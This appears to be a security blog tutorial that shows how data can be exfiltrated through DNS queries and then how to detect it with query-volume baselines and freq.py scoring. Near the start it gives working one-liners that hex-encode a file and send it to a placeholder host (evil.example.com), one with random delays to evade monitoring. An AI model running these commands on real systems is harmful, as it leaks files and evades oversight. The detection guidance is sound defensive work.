

Exfiltrating Data with DNS

Using DNS to exfiltrate information from a network is likely to be one of the least performant and most easily detected methods available to a malicious actor. It is, however, very easy to execute, and very likely to succeed in the short term, so it's worth being aware of how it could be done.

What is Exfil or Exfiltration?

Exfiltration of data is the process of exporting information from within a network to an external destination. In this case, it's a malicious user extracting something from your network to theirs. Typically, this export needs to be hidden, at least for the duration of the export, so that perimeter controls can't stop it.

How is it done?

I'll use simple tools to prove the concept so you can test your detection methods, but a miscreant is unlikely to use the same tools. More likely a malware toolkit will do all the encoding and will generate the destination based on an algorithm.

These methods are equally possible on Windows and Linux; it's just easier to demonstrate and test on Linux. Here is the easiest way of getting data out of a network using DNS queries:

# exfil in a single line
for label in $(xxd -p path-to-file); do dig ${label}.evil.example.com @evil-host.example.com; done

Voila! Reversibly hex-encoded data goes flying out of your network to the evildoer's servers. Of course, most networks will block direct DNS traffic, so you may need to use your local resolvers; more on that later. The bitrate per DNS query is low. You can use xxd's '-c 31' option to ensure that each line contains 62 characters (31 bytes of the original file), the most that fits within the 63-character limit of a single DNS label, thus maximising your output. But you are still going to generate a lot of DNS queries, even for small files.
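As a quick sanity check of the encoding itself (the sample file and its contents below are invented for illustration), the hex chunks round-trip cleanly:

```shell
# Write a small sample file (a stand-in for the real target file).
printf 'secret data to exfiltrate' > /tmp/sample.txt

# Hex-encode at 31 bytes (62 hex characters) per line, so each chunk
# still fits inside a single DNS label (63-character maximum).
xxd -p -c 31 /tmp/sample.txt

# Receiving side: reverse the encoding to recover the original bytes.
xxd -p -c 31 /tmp/sample.txt | xxd -r -p
```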

Detect High Volume of Queries

So we know that looking for an unusually high number of queries from a host might indicate exfiltration.

Knowing who your (DNS) top talkers are within your network is therefore important. A host that generally doesn't generate many queries but suddenly produces hundreds or even thousands of outbound queries is worth investigating.
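As a rough sketch of what that looks like, per-client query counts can be pulled out of a BIND-style query log. The simulated log lines and field positions below are assumptions, so adjust the awk to match your own named logging configuration:

```shell
# Simulated BIND-style query-log lines; a real log would live wherever
# your named.conf logging channels point (e.g. /var/log/named/query.log).
cat > /tmp/query.log <<'EOF'
01-Jan-2024 12:00:00.000 client 192.0.2.10#53214 (aa11bb22.evil.example.com): query: aa11bb22.evil.example.com IN A +
01-Jan-2024 12:00:01.000 client 192.0.2.10#53215 (cc33dd44.evil.example.com): query: cc33dd44.evil.example.com IN A +
01-Jan-2024 12:00:02.000 client 198.51.100.7#40000 (www.example.org): query: www.example.org IN A +
EOF

# Count queries per client IP; a previously quiet host at the top of
# this list deserves a closer look.
awk '{for (i = 1; i <= NF; i++) if ($i == "client") {split($(i+1), a, "#"); print a[1]}}' \
    /tmp/query.log | sort | uniq -c | sort -rn
```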

Hiding in Plain Sight

One very simple method of masking all those queries is to send them via the internal resolver. There'll be lots of legitimate queries from other users so maybe no one notices the spike from the exfiltrating host. So I'll remove @evil-host.example.com from the above command.

This does mean that edge network devices are less capable of detecting the exfil traffic and now the organisation is reliant on detecting it on an internal system. And everyone knows that internal systems are safe because of the big firewall at the network edge, so no need for trend monitoring on that resolver, right? As with perimeter monitoring, if you keep a baseline history of top talkers, you should investigate suddenly high volumes from previously quiet hosts.
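A baseline comparison can be as crude as diffing per-host counts between a saved snapshot and today's tally. The file names, format, and 10x threshold below are illustrative assumptions, not a standard:

```shell
# Saved baseline: "client-IP  daily-query-count" (illustrative format).
cat > /tmp/baseline.txt <<'EOF'
192.0.2.10 40
198.51.100.7 25
EOF

# Today's counts for the same hosts.
cat > /tmp/today.txt <<'EOF'
192.0.2.10 4200
198.51.100.7 30
EOF

# Flag any host whose query volume jumped more than 10x over baseline.
awk 'NR==FNR {base[$1]=$2; next}
     base[$1] > 0 && $2 > 10*base[$1] {print $1, "baseline:", base[$1], "today:", $2}' \
    /tmp/baseline.txt /tmp/today.txt
```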

What About "sleep 60"?

If I know or suspect someone is looking for exfil traffic, why wouldn't I just sleep between lookups? Rather than a fixed sleep time, I'll make it random. There's a balance here. I do want to exfil data in a timely fashion. I'll still need to generate lots of queries over a time frame of hours or maybe a day or two. So now I have:

for label in $(xxd -p path-to-file); do dig ${label}.evil.example.com; \
sleep $(( RANDOM % 60 )); done

But there's still all that traffic going to one domain.

DGAs Are The Future

Domain Generation Algorithms have been around since Conficker B. Some are sophisticated, some not so. For this post, I don't care about the algorithm, only that my exfil traffic is no longer going to one domain. Of course, if all your evil domains happen to be in one or two TLDs because those are cheap, the traffic will still be obvious.
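A throwaway sketch of the idea (real DGAs are far more elaborate, and the md5 truncation and example.com suffix here are purely illustrative): both the malware and its operator derive the same domain from the current date, so no destination needs to be hard-coded:

```shell
# Seed the "algorithm" with today's date; anyone running the same
# code on the same day computes the same rendezvous domain.
seed=$(date +%Y%m%d)

# Hash the seed and keep the first 12 hex characters as the label.
label=$(printf '%s' "$seed" | md5sum | cut -c1-12)

echo "${label}.example.com"
```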

But Those Labels Don't Look Legit To Me

We can hide the volume of traffic somewhat, and we can vary the destination, but domains generated by a DGA and the labels generated by our hex encoder are obviously unusual, at least to a human. Surely there is a command line tool we can use that looks at a string and says "A human would think this string is unusual"?

One thing we can't do is look for entropy in strings, since legitimate domains and host labels can have random values in them. Instead, I'm going to use the tool freq.py to find collections of strings that are not common in domains.

The one-liner below extracts the queried domain and pipes it through to freq.py, which scores how likely the string is to appear among legitimate queries. The lower the numeric output from freq, the more likely the domain contains unusual or unexpected text (not randomness).

for domain in $(awk '{print $8}' /var/log/named/query.log); \
do score=$(./freq.py -m "${domain}" freq2018.freq | \
sed 's/[\(,\)]//g' | awk '{print $2}'); \
if (( $(echo "${score} < 1" | bc) )); \
then echo "${domain}:${score}"; fi; done

Some More About freq.py

I've used the default frequency file found in its GitHub repo, but you can create your own file and populate it with data which is normal for you. I've used freq's second measurement value, which I've found to be a little more representative of what is normal and what is abnormal. Remember that you want freq to detect encoded data, not malicious domains, so you should be able to feed it (-f) your standard query logs without having to manipulate or curate their content.

First we need to create a new file that will only contain queried domains which are normal for our network. The larger the data set the more effective freq will be, so be sure to add as many weeks or months worth of data that you can.

Creating a new frequency file

./freq.py -c common_domains.freq

Let's collect some queried domain names and store them in a file.

awk '{print $8}' /var/log/named/query.log > baseline_queries.txt

Now we feed the baseline data to freq to populate our frequency table.

./freq.py -f baseline_queries.txt common_domains.freq

You can add a single entry (-n) and specify a frequency of occurrence (-w)

./freq.py -n "totally.legit.example.com" -w 30000 common_domains.freq

If you've collected some more domains, you can update the table

./freq.py -f more_queries.txt common_domains.freq


The method for exfiltrating data was inspired by this post (also contains a Windows method): detecting-data-exfiltraton-via-dns-queries

Mark Baggett's freq.py has several github pages, but this one has the most recent commits and was the version I used: freq.py

There's a write up about using freq.py in more detail here: wiki.sans.blue